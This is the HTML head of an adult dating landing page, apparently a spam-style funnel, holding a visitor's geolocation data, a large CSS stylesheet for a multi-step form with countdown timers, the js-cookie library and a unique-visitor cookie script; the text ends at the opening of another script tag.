<html lang="en" class="no-js">
<head><script>function requestLink(){return {sessionId:['sid','t1~zabozxvpjqvnrrixbn0f1qjq']};}var geoData={"cc":"MA","cnames":{"de":"Marokko","en":"Morocco","es":"Marruecos","fr":"Maroc","ja":"モロッコ王国","pt-BR":"Marrocos","ru":"Марокко","zh-CN":"摩洛哥"},"city":{"de":"","en":"","es":"","fr":"","ja":"","pt-BR":"","ru":"","zh-CN":""},"subdiv":{"de":"","en":"","es":"","fr":"","ja":"","pt-BR":"","ru":"","zh-CN":""},"pc":"","lat":33.5922,"long":-7.6184};var ip='105.67.0.56';</script>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="robots" content="noindex, nofollow">
	<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
	<title id="title">Looking for sex tonight in your area?</title>
	<link href="//fonts.googleapis.com/css?family=Montserrat:300,400,700" rel="stylesheet">
	<style>
		.step, .timer__circle, .upgrade, svg:not(:root) {
	overflow: hidden
}
body, figure, ul {
	margin: 0
}
legend, ul {
	padding: 0
}
b, strong {
	font-weight: 700
}
.button--play:after, .button--play:before, .icon--timer:before, .icon:after {
	content: ''
}
.button, .footer a {
	text-decoration: none
}
.button__container {
	margin-bottom: 0.7rem;
}
article, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary {
	display: block
}
audio, canvas, video {
	display: inline-block
}
audio:not([controls]) {
	display: none;
	height: 0
}
[hidden] {
	display: none
}
html {
	font-family: sans-serif;
	-ms-text-size-adjust: 100%;
	-webkit-text-size-adjust: 100%
}
a:focus {
	outline: dotted thin
}
a, a:active, a:hover, button {
	outline: 0
}
h1 {
	font-size: 2em;
	margin: .67em 0
}
abbr[title] {
	border-bottom: .0625rem dotted
}
dfn {
	font-style: italic
}
hr {
	-moz-box-sizing: content-box;
	box-sizing: content-box;
	height: 0
}
mark {
	background: #ff0;
	color: #000
}
a, body {
	color: #fff
}
code, kbd, pre, samp {
	font-family: monospace, serif;
	font-size: 1em
}
pre {
	white-space: pre-wrap
}
q {
	quotes: "\201C" "\201D" "\2018" "\2019"
}
small {
	font-size: 80%
}
sub, sup {
	font-size: 75%;
	line-height: 0;
	position: relative;
	vertical-align: baseline
}
sup {
	top: -.5em
}
sub {
	bottom: -.25em
}
img {
	border: 0
}
fieldset {
	border: .0625rem solid silver;
	margin: 0 .125rem;
	padding: .35em .625em .75em
}
legend {
	border: 0
}
button, input, select, textarea {
	font-family: inherit;
	font-size: 100%;
	margin: 0
}
button, input {
	line-height: normal
}
button, select {
	text-transform: none
}
button, html input[type=button], input[type=reset], input[type=submit] {
	-webkit-appearance: button;
	cursor: pointer
}
button[disabled], html input[disabled] {
	cursor: default
}
input[type=checkbox], input[type=radio] {
	box-sizing: border-box;
	padding: 0
}
input[type=search] {
	-webkit-appearance: textfield;
	-moz-box-sizing: content-box;
	-webkit-box-sizing: content-box;
	box-sizing: content-box
}
input[type=search]::-webkit-search-cancel-button, input[type=search]::-webkit-search-decoration {
	-webkit-appearance: none
}
button::-moz-focus-inner, input::-moz-focus-inner {
	border: 0;
	padding: 0
}
textarea {
	overflow: auto;
	vertical-align: top
}
table {
	border-collapse: collapse;
	border-spacing: 0
}
@font-face {
	font-family: HN;
	src: url(../fonts/HN.eot);
	src: url(../fonts/HN.eot) format('embedded-opentype'), 
	url(../fonts/HN.woff2) format('woff2'), 
	url(../fonts/HN.woff) format('woff'), 
	url(../fonts/HN.ttf) format('truetype'), 
	url(../fonts/HN.svg#HN) format('svg');
	font-weight: 400
}
@font-face {
	font-family: HNBold;
	src: url(../fonts/HNBold.eot);
	src: url(../fonts/HNBold.eot) format('embedded-opentype'), 
	url(../fonts/HNBold.woff2) format('woff2'), 
	url(../fonts/HNBold.woff) format('woff'), 
	url(../fonts/HNBold.ttf) format('truetype'), 
	url(../fonts/HNBold.svg#HNBold) format('svg');
	font-weight: 400
}
@font-face {
	font-family: HNCBold;
	src: url(../fonts/HNCBold.eot);
	src: url(../fonts/HNCBold.eot) format('embedded-opentype'), 
	url(../fonts/HNCBold.woff2) format('woff2'), 
	url(../fonts/HNCBold.woff) format('woff'), 
	url(../fonts/HNCBold.ttf) format('truetype'), 
	url(../fonts/HNCBold.svg#HNCBold) format('svg');
	font-weight: 400
}
.icon--timer:before, .icon:after {
	display: inline-block;
	background-image: url(../fonts/icons_alt.svg);
	background-repeat: no-repeat
}
.icon--arrow:after {
	width: 22px;
	height: 22px;
	background-position: 0 0
}
.icon--arrow2:after {
	width: 11px;
	height: 14px;
	background-position: 0 -22px
}
.icon--no:after {
	width: 28px;
	height: 28px;
	background-position: 0 -36px
}
.icon--send:after {
	width: 18px;
	height: 18px;
	background-position: 0 -64px
}
.icon--timer:before {
	width: 72px;
	height: 72px;
	background-position: 0 -82px
}
.icon--yes:after {
	width: 31px;
	height: 24px;
	background-position: 0 -154px
}
html {
	box-sizing: border-box
}
html.is--inputfocus {
	position: static!important;
	top: 0!important;
	-webkit-transform: rotate(0)!important;
	transform: rotate(0)!important;
	-webkit-transform-origin: center center!important;
	transform-origin: center center!important;
	width: 100%!important;
	height: 100%!important
}
*, :after, :before {
	box-sizing: inherit;
	text-rendering: geometricPrecision
}
body, form, html {
	height: 100%;
	width: 100%
}
body {
	position: relative;
	font-family: Montserrat, HN, "Helvetica Neue", Helvetica, Arial, sans-serif;
	background: #212121
}
ul {
	list-style: none
}
a, button {
	-webkit-tap-highlight-color: transparent
}
.u--layout--sticky-footer {
	display: -webkit-box;
	display: -ms-flexbox;
	display: flex;
	-webkit-box-orient: vertical;
	-webkit-box-direction: normal;
	-ms-flex-direction: column;
	flex-direction: column
}
.u__position__center {
	position: absolute;
	top: 50%;
	left: 50%;
	-webkit-transform: translate(-50%, -68%);
	transform: translate(-50%, -68%);
	width: 100%;
	padding: 1.5rem
}
.u__position__bottom {
	position: absolute;
	bottom: 0;
	width: 100%;
	padding: 1.5rem 1.125rem
}
.u__position__bottom .text--18 {
	margin-bottom: 1.25rem;
	line-height: 1.4
}
.u__position__bottom .text--22 {
	margin-bottom: .875rem;
	line-height: 1.2
}
[data-step="4"] .u__position__bottom .text--18, [data-step="5"] .u__position__bottom .text--18 {
	margin-bottom: .8125rem
}
[data-step="6"] .u__position__bottom .text--18 {
	margin-bottom: .625rem
}
.upgrade .u__position__bottom {
	padding: 1.125rem
}
.upgrade .u__position__bottom .text--18 {
	max-width: 96%;
	margin: 0 auto .125rem;
	line-height: 1.2
}
.button {
	display: inline-block;
	padding: 0;
	border: 0;
	background: 0 0
}
.button--send {
	position: absolute;
	top: -.5625rem;
	right: .375rem;
	width: 2.25rem;
	border-radius: 100%
}
.button--send:after {
	position: absolute;
	top: 50%;
	left: 50%;
	-webkit-transform: translate(-40%, -50%);
	transform: translate(-40%, -50%)
}
.button--no, .button--yes {
	position: relative;
	width: 4.125rem;
	margin: 0 1.0625rem;
	border-radius: 100%
}
.button--send, .button--yes {
	-webkit-box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.27);
  box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.27);
  background: #fd267d;
  background: -moz-linear-gradient(left, #fd267d 0%, #ff7854 100%);
  background: -webkit-linear-gradient(left, #fd267d 0%, #ff7854 100%);
  background: linear-gradient(to right, #fd267d 0%, #ff7854 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fd267d', endColorstr='#ff7854', GradientType=1);
}
.button--no {
	background-color: transparent;
	border: 1px solid #fd267d;
}
.button--no:before, .button--send:before, .button--yes:before {
	content: '';
	display: block;
	padding-bottom: 99%
}
.button--no:after, .button--yes:after {
	position: absolute;
	top: 50%;
	left: 50%;
	-webkit-transform: translate(-50%, -50%);
	transform: translate(-50%, -50%)
}
.button--flat {
	width: 100%;
	max-width: 17rem;
	margin-top: .5rem;
	margin-bottom: .625rem;
	padding: .875rem 1.25rem;
	border-radius: 1.875rem;
	-webkit-box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.27);
  box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.27);
  background: #fd267d;
  background: -moz-linear-gradient(left, #fd267d 0%, #ff7854 100%);
  background: -webkit-linear-gradient(left, #fd267d 0%, #ff7854 100%);
  background: linear-gradient(to right, #fd267d 0%, #ff7854 100%);
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fd267d', endColorstr='#ff7854', GradientType=1);
	font-family: HNBold, "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-weight: 400;
	color: #fff
}
.button--flat:after {
	position: relative;
	top: -.0625rem;
	margin-left: .625rem;
	vertical-align: middle
}
.upgrade .button--flat {
	max-width: 15.75rem
}
.button--play {
	position: relative;
	width: 5.875rem;
	margin: 1.6875rem 0 .8125rem;
	background: -webkit-linear-gradient(left, rgba(253, 38, 125, 0.6) 0%, rgba(255, 120, 84, 0.6) 100%);
  background: linear-gradient(to right, rgba(253, 38, 125, 0.6) 0%, rgba(255, 120, 84, 0.6) 100%);
	border-radius: 100%
}
.button--play:after {
	display: block;
	padding-bottom: 99%
}
.button--play:before {
	position: absolute;
	top: 50%;
	left: 50%;
	-webkit-transform: translate(-32%, -50%);
	transform: translate(-32%, -50%);
	width: 0;
	height: 0;
	border-style: solid;
	border-width: 1.5rem 0 1.5rem 2.25rem;
	border-color: transparent transparent transparent #fff
}
.form__group, .step, .tour, .upgrade {
	position: relative
}
.main {
	-webkit-box-flex: 1;
	-ms-flex: 1;
	flex: 1
}
.tour {
	width: 100%;
	height: auto;
	font-size: 0;
	z-index: 1
}
.tour__wrapper {
	white-space: nowrap;
	overflow-x: hidden
}
.step, .upgrade {
	will-change: auto;
	left: 0;
	z-index: 10;
	display: inline-block;
	width: 100%;
	float: left;
	margin: 0;
	padding: 0;
	vertical-align: top;
	white-space: normal;
	text-align: center;
	opacity: 0;
	pointer-events: none;
	-webkit-transition: opacity .1s ease-out;
	-moz-transition: opacity .1s ease-out;
	-o-transition: opacity .1s ease-out;
	transition: opacity .1s ease-out
}
.step__wrapper {
	height: 0
}
.is--visible {
	opacity: 1;
	pointer-events: auto
}
.text {
	display: block
}
.text--9 {
	font-size: .5625rem
}
.text--12 {
	font-size: .75rem
}
.text--16 {
	font-size: 1rem
}
.text--17 {
	font-size: 1.0625rem
}
.text--18 {
	font-size: 1.125rem
}
.text--20 {
	font-size: 1.25rem
}
.text--22 {
	font-size: 1.375rem
}
.step[data-step="5"] .text--26 {
	margin-bottom: 10px;
}
.text--26 {
	font-size: 1.625rem
}
.text--43 {
	font-size: 2.6875rem
}
.text--green {
	color: #00D984
}
.text--red {
	color: #fd267d;
}
.text--hn {
	font-family: HN, "Helvetica Neue", Helvetica, Arial, sans-serif
}
.text--hnc {
	font-family: HNCBold, "Helvetica Neue", Helvetica, Arial, sans-serif
}
.text--hn strong, .text--hnc strong {
	font-weight: 700
}
.form__input, .text--light {
	font-weight: 300
}
.text--disclaimer {
	max-width: 500px;
	margin-left: auto;
	margin-right: auto;
	line-height: 1.4;
	letter-spacing: .02em;
	text-transform: uppercase
}
.text--disclaimer, .text--disclaimer a {
	color: #999
}
.text.icon--timer {
	max-width: 82%;
	padding-top: 5.5rem;
	margin: 0 auto
}
.text.icon--timer:before {
	display: block;
	margin: 0 auto .375rem;
	opacity: .75
}
.form__group {
	max-width: 15.25rem;
	margin: 1.125rem auto 0;
	padding-bottom: .5625rem
}
.form__input {
	width: 100%;
	padding: 0;
	border: 0;
	background-color: transparent;
	outline: 0;
	color: #fff;
	letter-spacing: -.05em;
	border-radius: 0;
	-webkit-appearance: none;
	appearance: none
}
.form__input::-webkit-input-placeholder {
	color: #fff
}
.form__input:-moz-placeholder {
	color: #fff;
	opacity: 1
}
.form__input:-ms-input-placeholder {
	color: #fff
}
.form__input--underline {
	padding: .375rem 3.2rem .375rem .375rem;
	border-bottom: 1px solid #00D984
}
.step__field__error {
	display: none;
	padding: .75rem 0 0;
	color: #de4926;
	text-align: left
}
.timer:before, .timer__container:after {
	display: block;
	padding-bottom: 100%;
	content: ''
}
.form__group--error .step__field__error {
	display: block
}
.poster, .video {
	position: fixed;
	top: 50%;
	left: 50%;
	min-width: 100%;
	min-height: 100%;
	width: auto;
	height: auto;
	-webkit-transform: translate(-50%, -50%);
	transform: translate(-50%, -50%);
	-webkit-transition: filter .1s ease-out, transform .1s ease-out, opacity .1s ease-out;
	transition: filter .1s ease-out, transform .1s ease-out, opacity .1s ease-out
}
.objectfit .video {
	top: 0;
	left: 0;
	min-width: 0;
	min-height: 0;
	width: 100%;
	height: 100%;
	object-fit: cover;
	-webkit-transform: translate(0, 0);
	transform: translate(0, 0)
}
.is--blurry {
	-webkit-filter: blur(5px);
	filter: blur(5px);
	-webkit-transform: translate3d(-50%, -50%, 0) scale3d(1.05, 1.05, 1.05);
	transform: translate3d(-50%, -50%, 0) scale3d(1.05, 1.05, 1.05);
	opacity: .7
}
.objectfit .is--blurry {
	-webkit-transform: translate3d(0, 0, 0) scale3d(1.05, 1.05, 1.05)!important;
	transform: translate3d(0, 0, 0) scale3d(1.05, 1.05, 1.05)!important
}
.poster.is--hidden {
	opacity: 0;
	pointer-events: none
}
.timer__container {
	position: fixed;
	top: .75rem;
	right: 1.875rem;
	z-index: 5;
	width: 100%;
	max-width: 2.375rem;
	border-radius: 100%;
	box-shadow: 0 0 .25rem rgba(0, 0, 0, .8);
	opacity: 0;
	-webkit-transition: opacity .1s ease-out;
	-moz-transition: opacity .1s ease-out;
	-o-transition: opacity .1s ease-out;
	transition: opacity .1s ease-out
}
.timer, .timer__circle, .timer__pie {
	position: absolute
}
.timer__container.is--active {
	opacity: 1
}
.timer__container:before {
	content: '';
	display: block;
	position: absolute;
	top: 0;
	left: 0;
	z-index: 20;
	width: 100%;
	height: 100%;
	border: .3125rem solid #fff;
	border-radius: 100%;
	opacity: .3;
	box-shadow: inset 0 0 .3125rem rgba(0, 0, 0, .8)
}
.timer {
	top: 50%;
	left: 50%;
	width: 100%;
	-webkit-transform: translate(-50%, -50%);
	transform: translate(-50%, -50%)
}
.timer--outside {
	opacity: .8
}
.timer--inside {
	width: calc(100% - .625rem);
	opacity: .3
}
.timer__circle {
	top: 0;
	right: 0;
	width: 50%;
	height: 100%;
	background: 0 0;
	-webkit-animation: none;
	animation: none
}
.animation .timer__circle {
	-webkit-animation-name: mask;
	animation-name: mask;
	-webkit-animation-timing-function: steps(1, end);
	animation-timing-function: steps(1, end);
	-webkit-animation-iteration-count: 1;
	animation-iteration-count: 1;
	-webkit-animation-play-state: running;
	animation-play-state: running
}
.timer__pie {
	-webkit-transform-origin: 100% 50%;
	transform-origin: 100% 50%;
	width: 100%;
	height: 100%;
	border: .3125rem solid transparent;
	background: 0 0
}
.timer--outside .timer__pie {
	border-color: #fff
}
.timer__spinner {
	right: 100%;
	z-index: 200;
	border-radius: 100% 0 0 100%/50% 0 0 50%;
	border-right: none;
	-webkit-animation: none;
	animation: none
}
.animation .timer__spinner {
	-webkit-animation-name: rota, widthchange;
	animation-name: rota, widthchange;
	-webkit-animation-timing-function: linear, steps(1, end);
	animation-timing-function: linear, steps(1, end);
	-webkit-animation-iteration-count: 1, 1;
	animation-iteration-count: 1, 1;
	-webkit-animation-play-state: running;
	animation-play-state: running
}
.timer__filler {
	right: 0;
	z-index: 100;
	width: 50%;
	border-left: none;
	border-radius: 0 100% 100% 0/0 50% 50% 0;
	opacity: 0;
	-webkit-animation: none;
	animation: none
}
.animation .timer__filler {
	-webkit-animation-name: opa;
	animation-name: opa;
	-webkit-animation-timing-function: steps(1, end);
	animation-timing-function: steps(1, end);
	-webkit-animation-iteration-count: 1;
	animation-iteration-count: 1;
	-webkit-animation-play-state: running;
	animation-play-state: running
}
.timer--inside .timer__filler, .timer--inside .timer__spinner {
	background-color: #fff
}
.animation1 .timer--inside .timer__circle, 
.animation1 .timer--inside .timer__filler, 
.animation1 .timer--inside .timer__spinner, 
.animation1 .timer--outside1 .timer__circle, 
.animation1 .timer--outside1 .timer__filler, 
.animation1 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 1.7s;
	animation-duration: 1.7s
}
.animation2 .timer--inside .timer__circle, 
.animation2 .timer--inside .timer__filler,
.animation2 .timer--inside .timer__spinner {
	-webkit-animation-duration: 4s;
	animation-duration: 4s
}
.animation2 .timer--outside1 .timer__circle, 
.animation2 .timer--outside1 .timer__filler, 
.animation2 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 4s;
	animation-duration: 4s;
	/* -webkit-animation-iteration-count: 2, 2; */
	/* animation-iteration-count: 2, 2 */
}
.animation3 .timer--inside .timer__circle, 
.animation3 .timer--inside .timer__filler, 
.animation3 .timer--inside .timer__spinner, 
.animation3 .timer--outside1 .timer__circle, 
.animation3 .timer--outside1 .timer__filler, 
.animation3 .timer--outside1 .timer__spinner, 
.animation4 .timer--inside .timer__circle, 
.animation4 .timer--inside .timer__filler, 
.animation4 .timer--inside .timer__spinner, 
.animation4 .timer--outside1 .timer__circle, 
.animation4 .timer--outside1 .timer__filler, 
.animation4 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 2s;
	animation-duration: 2s
}
.animation5 .timer--inside .timer__circle, 
.animation5 .timer--inside .timer__filler,
.animation5 .timer--inside .timer__spinner,
.animation5 .timer--outside1 .timer__circle, 
.animation5 .timer--outside1 .timer__filler, 
.animation5 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 4s;
	animation-duration: 4s;
}
/* .animation5 .timer--inside .timer__circle, 
.animation5 .timer--inside .timer__filler, 
.animation5 .timer--inside .timer__spinner {
	-webkit-animation-duration: 4s;
	animation-duration: 4s
}
.animation5 .timer--outside1 .timer__circle {
	animation-name: mask;
	animation-duration: 2.7s;
	animation-delay: 0s
}
.animation5 .timer--outside1 .timer__filler {
	animation-name: opa;
	animation-duration: 2.7s;
	animation-delay: 0s
}
.animation5 .timer--outside1 .timer__spinner {
	animation-name: rota, widthchange;
	animation-duration: 2.7s, 2.7s;
	animation-delay: 0s, 0s
}
.animation5 .timer--outside2 .timer__circle {
	animation-name: mask;
	animation-duration: 1.3s;
	animation-delay: 2.7s
}
.animation5 .timer--outside2 .timer__filler {
	animation-name: opa;
	animation-duration: 1.3s;
	animation-delay: 2.7s
}
.animation5 .timer--outside2 .timer__spinner {
	animation-name: rota, widthchange;
	animation-duration: 1.3s, 1.3s;
	animation-delay: 2.7s, 2.7s
} */
.animation6 .timer--inside .timer__circle, 
.animation6 .timer--inside .timer__filler, 
.animation6 .timer--inside .timer__spinner, 
.animation6 .timer--outside1 .timer__circle, 
.animation6 .timer--outside1 .timer__filler, 
.animation6 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 3s;
	animation-duration: 3s
}
.animation7 .timer--inside .timer__circle, 
.animation7 .timer--inside .timer__filler, 
.animation7 .timer--inside .timer__spinner, 
.animation7 .timer--outside1 .timer__circle, 
.animation7 .timer--outside1 .timer__filler, 
.animation7 .timer--outside1 .timer__spinner {
	-webkit-animation-duration: 10s;
	animation-duration: 10s
}
@-webkit-keyframes rota {
	from {
		-webkit-transform: rotate(0);
		transform: rotate(0)
	}
	to {
		-webkit-transform: rotate(360deg);
		transform: rotate(360deg)
	}
}
@keyframes rota {
	from {
		transform: rotate(0)
	}
	to {
		transform: rotate(360deg)
	}
}
@-webkit-keyframes pos {
	100%, 50% {
		left: 0
	}
}
@keyframes pos {
	100%, 50% {
		left: 0
	}
}
@-webkit-keyframes opa {
	100%, 50% {
		width: 50%;
		opacity: 1
	}
}
@keyframes opa {
	100%, 50% {
		width: 50%;
		opacity: 1
	}
}
@-webkit-keyframes mask {
	100%, 50% {
		width: 100%
	}
}
@keyframes mask {
	100%, 50% {
		width: 100%
	}
}
@-webkit-keyframes widthchange {
	100%, 50% {
		right: 50%;
		width: 50%
	}
}
@keyframes widthchange {
	100%, 50% {
		right: 50%;
		width: 50%
	}
}
footer {
	position: relative;
	z-index: 999;
	background: rgba(33, 33, 33, .4)
}
.is--android footer {
	-webkit-transform: translateY(100%);
	transform: translateY(100%)
}
.footer a {
	font-size: .75rem;
	opacity: .6
}
.is--loading .button--play {
	background-color: rgba(59, 59, 59, 0)
}
.is--loading .button--play:before {
	display: none
}
.is--loading .loader--circle {
	display: block
}
.is--loading .text--press {
	opacity: 0
}
.loader--circle {
	display: none;
	position: absolute;
	top: 50%;
	left: 50%;
	-webkit-transform: translate(-50%, -50%);
	transform: translate(-50%, -50%);
	width: 2.5rem;
	height: 2.5rem
}
.loader--circle .loader--circle-el {
	width: 100%;
	height: 100%;
	position: absolute;
	left: 0;
	top: 0
}
.loader--circle .loader--circle-el:before {
	content: '';
	display: block;
	margin: 0 auto;
	width: 15%;
	height: 15%;
	background-color: #fff;
	border-radius: 100%;
	-webkit-animation: sk-circleFadeDelay 1.2s infinite ease-in-out both;
	animation: sk-circleFadeDelay 1.2s infinite ease-in-out both
}
.loader--circle .loader--circle-el2 {
	-webkit-transform: rotate(30deg);
	-ms-transform: rotate(30deg);
	transform: rotate(30deg)
}
.loader--circle .loader--circle-el3 {
	-webkit-transform: rotate(60deg);
	-ms-transform: rotate(60deg);
	transform: rotate(60deg)
}
.loader--circle .loader--circle-el4 {
	-webkit-transform: rotate(90deg);
	-ms-transform: rotate(90deg);
	transform: rotate(90deg)
}
.loader--circle .loader--circle-el5 {
	-webkit-transform: rotate(120deg);
	-ms-transform: rotate(120deg);
	transform: rotate(120deg)
}
.loader--circle .loader--circle-el6 {
	-webkit-transform: rotate(150deg);
	-ms-transform: rotate(150deg);
	transform: rotate(150deg)
}
.loader--circle .loader--circle-el7 {
	-webkit-transform: rotate(180deg);
	-ms-transform: rotate(180deg);
	transform: rotate(180deg)
}
.loader--circle .loader--circle-el8 {
	-webkit-transform: rotate(210deg);
	-ms-transform: rotate(210deg);
	transform: rotate(210deg)
}
.loader--circle .loader--circle-el9 {
	-webkit-transform: rotate(240deg);
	-ms-transform: rotate(240deg);
	transform: rotate(240deg)
}
.loader--circle .loader--circle-el10 {
	-webkit-transform: rotate(270deg);
	-ms-transform: rotate(270deg);
	transform: rotate(270deg)
}
.loader--circle .loader--circle-el11 {
	-webkit-transform: rotate(300deg);
	-ms-transform: rotate(300deg);
	transform: rotate(300deg)
}
.loader--circle .loader--circle-el12 {
	-webkit-transform: rotate(330deg);
	-ms-transform: rotate(330deg);
	transform: rotate(330deg)
}
.loader--circle .loader--circle-el2:before {
	-webkit-animation-delay: -1.1s;
	animation-delay: -1.1s
}
.loader--circle .loader--circle-el3:before {
	-webkit-animation-delay: -1s;
	animation-delay: -1s
}
.loader--circle .loader--circle-el4:before {
	-webkit-animation-delay: -.9s;
	animation-delay: -.9s
}
.loader--circle .loader--circle-el5:before {
	-webkit-animation-delay: -.8s;
	animation-delay: -.8s
}
.loader--circle .loader--circle-el6:before {
	-webkit-animation-delay: -.7s;
	animation-delay: -.7s
}
.loader--circle .loader--circle-el7:before {
	-webkit-animation-delay: -.6s;
	animation-delay: -.6s
}
.loader--circle .loader--circle-el8:before {
	-webkit-animation-delay: -.5s;
	animation-delay: -.5s
}
.loader--circle .loader--circle-el9:before {
	-webkit-animation-delay: -.4s;
	animation-delay: -.4s
}
.loader--circle .loader--circle-el10:before {
	-webkit-animation-delay: -.3s;
	animation-delay: -.3s
}
.loader--circle .loader--circle-el11:before {
	-webkit-animation-delay: -.2s;
	animation-delay: -.2s
}
.loader--circle .loader--circle-el12:before {
	-webkit-animation-delay: -.1s;
	animation-delay: -.1s
}
@-webkit-keyframes sk-circleFadeDelay {
	0%, 100%, 39% {
		opacity: 0
	}
	40% {
		opacity: 1
	}
}
@keyframes sk-circleFadeDelay {
	0%, 100%, 39% {
		opacity: 0
	}
	40% {
		opacity: 1
	}
}
@media only screen and (min-width:400px) {
	html {
		font-size: 18px
	}
}
@media only screen and (min-width:480px) {
	html {
		font-size: 20px
	}
}
@media only screen and (min-height:768px) {
	.upgrade .u__position__bottom {
		position: static;
		margin-top: 2.5rem
	}
}
@media only screen and (orientation:landscape) {
	.is--desktop.objectfit .video {
		object-fit: contain
	}
	.is--desktop .poster, .is--desktop .video {
		min-width: 0
	}
	html.is--mobile {
		position: fixed;
		top: -100vw;
		-webkit-transform: rotate(90deg);
		transform: rotate(90deg);
		-webkit-transform-origin: bottom left;
		transform-origin: bottom left;
		width: 100vh;
		height: 100vw
	}
	html.is--ios {
		/* width: calc(100vh - 5rem) */
	}
	.is--mobile .is--active .step__wrapper {
		height: 100vw!important
	}
	.is--android .is--blurry {
		opacity: 1
	}
}
@media only screen and (max-height:360px) and (orientation:landscape) {
	html {
		font-size: 14px
	}
}
@media only screen and (max-height:280px) and (orientation:landscape) {
	html {
		font-size: 12px
	}
	html.is--android, 
	html.is--android form {
		width: 280px;
		margin: 0 auto
	}
}

/* Unsubscribe */
.unsubscribe {
	position: absolute;    
	width: 100%;
    z-index: 100;
	text-align: center;
	bottom: 7px;
}
.unsubscribe a { 
	color: #fff;
	font-weight: 400;
	font-size: 10px;
	text-decoration: none;
}
.unsubscribe a:hover {
	text-decoration: underline;
}

/* =========================================================================
   Additional
 =========================================================================== */

.big-buttons .button--play {
	width: 8rem;
	margin: 1.6875rem 0 1.8125rem;
}

.big-buttons .button--play:before {
	border-width: 2rem 0 2rem 3rem;
}

.big-buttons .button--flat {
	padding: 1.25rem 1.25rem;
	border-radius: 2.2rem;
	max-width: 17.5rem;
}

.big-buttons .button--no,
.big-buttons .button--yes {
	width: 5rem;
}

.userLocation2 span {
	color: #fd267d;
}
	</style>
	<script>
		/*!
 * JavaScript Cookie v2.1.3
 * https://github.com/js-cookie/js-cookie
 *
 * Copyright 2006, 2015 Klaus Hartl & Fagner Brack
 * Released under the MIT license
 */
!function(e){var n=!1;if("function"==typeof define&&define.amd&&(define(e),n=!0),"object"==typeof exports&&(module.exports=e(),n=!0),!n){var t=window.Cookies,o=window.Cookies=e();o.noConflict=function(){return window.Cookies=t,o}}}(function(){function e(){for(var e=0,n={};e<arguments.length;e++){var t=arguments[e];for(var o in t)n[o]=t[o]}return n}function n(t){function o(n,r,i){var c;if("undefined"!=typeof document){if(arguments.length>1){if(i=e({path:"/"},o.defaults,i),"number"==typeof i.expires){var a=new Date;a.setMilliseconds(a.getMilliseconds()+864e5*i.expires),i.expires=a}try{c=JSON.stringify(r),/^[\{\[]/.test(c)&&(r=c)}catch(s){}return r=t.write?t.write(r,n):encodeURIComponent(String(r)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),n=encodeURIComponent(String(n)),n=n.replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent),n=n.replace(/[\(\)]/g,escape),document.cookie=[n,"=",r,i.expires?"; expires="+i.expires.toUTCString():"",i.path?"; path="+i.path:"",i.domain?"; domain="+i.domain:"",i.secure?"; secure":""].join("")}n||(c={});for(var p=document.cookie?document.cookie.split("; "):[],u=/(%[0-9A-Z]{2})+/g,d=0;d<p.length;d++){var f=p[d].split("="),l=f.slice(1).join("=");'"'===l.charAt(0)&&(l=l.slice(1,-1));try{var m=f[0].replace(u,decodeURIComponent);if(l=t.read?t.read(l,m):t(l,m)||l.replace(u,decodeURIComponent),this.json)try{l=JSON.parse(l)}catch(s){}if(n===m){c=l;break}n||(c[m]=l)}catch(s){}}return c}}return o.set=o,o.get=function(e){return o.call(o,e)},o.getJSON=function(){return o.apply({json:!0},[].slice.call(arguments))},o.defaults={},o.remove=function(n,t){o(n,"",e(t,{expires:-1}))},o.withConverter=n,o}return n(function(){})});

/* docReady is a single plain javascript function that provides a method of scheduling one or more javascript functions to run at some later point when the DOM has finished loading. */ 
!function(t,e){"use strict";function n(){if(!a){a=!0;for(var t=0;t<o.length;t++)o[t].fn.call(window,o[t].ctx);o=[]}}function d(){"complete"===document.readyState&&n()}t=t||"docReady",e=e||window;var o=[],a=!1,c=!1;e[t]=function(t,e){return a?void setTimeout(function(){t(e)},1):(o.push({fn:t,ctx:e}),void("complete"===document.readyState||!document.attachEvent&&"interactive"===document.readyState?setTimeout(n,1):c||(document.addEventListener?(document.addEventListener("DOMContentLoaded",n,!1),window.addEventListener("load",n,!1)):(document.attachEvent("onreadystatechange",d),window.attachEvent("onload",n)),c=!0)))}}("docReady",window);

/**
 * Add cookie on page closing event to detect unique visitors.
 * This javascript file checks for the brower/browser tab action.
 */
var exDays = 2;

var validNavigation = false;

function wireUpEvents() {

	var isOnIOS = /iPad|iPhone|iPod/.test(navigator.userAgent) && !window.MSStream;
    var eventName = isOnIOS ? "pagehide" : "beforeunload";

    window.addEventListener(eventName, function(e) {
		if (!validNavigation) {

			if (Cookies.get("IsNotUnique")) {
				Cookies.remove("IsNotUnique");
				Cookies.set('IsNotUnique2', 'true', { expires: exDays });
			}
			else if (Cookies.get("IsNotUnique2")){
				Cookies.remove("IsNotUnique2");
			}
			else {
				Cookies.set('IsNotUnique', 'true', { expires: exDays });
			}

            if(!e) e = window.event;
            e.cancelBubble = true;
            if (e.stopPropagation) {
                e.stopPropagation();
            }
        }
		return null;
    });

    // Attach the event keypress to exclude the F5 refresh
	document.addEventListener('keypress', function(e) {
        if (e.keyCode == 116){
            validNavigation = true;
        }
    });
	// Attach the event click for all links, forms, input=submit in the page	
	document.onclick = function(event) {
		var el = event.target;
		if (el.nodeName == "form" || el.nodeName == "a" || el.nodeName == "input[type=submit]") {
			validNavigation = true;
		}
	};
}

// Wire up the events as soon as the DOM tree is ready
docReady(function() {
    wireUpEvents();
});
	</script>
	<script>
/** docReady is a single plain javascript function that provides a method of scheduling one or more javascript functions to run at some later point when the DOM has finished loading. */
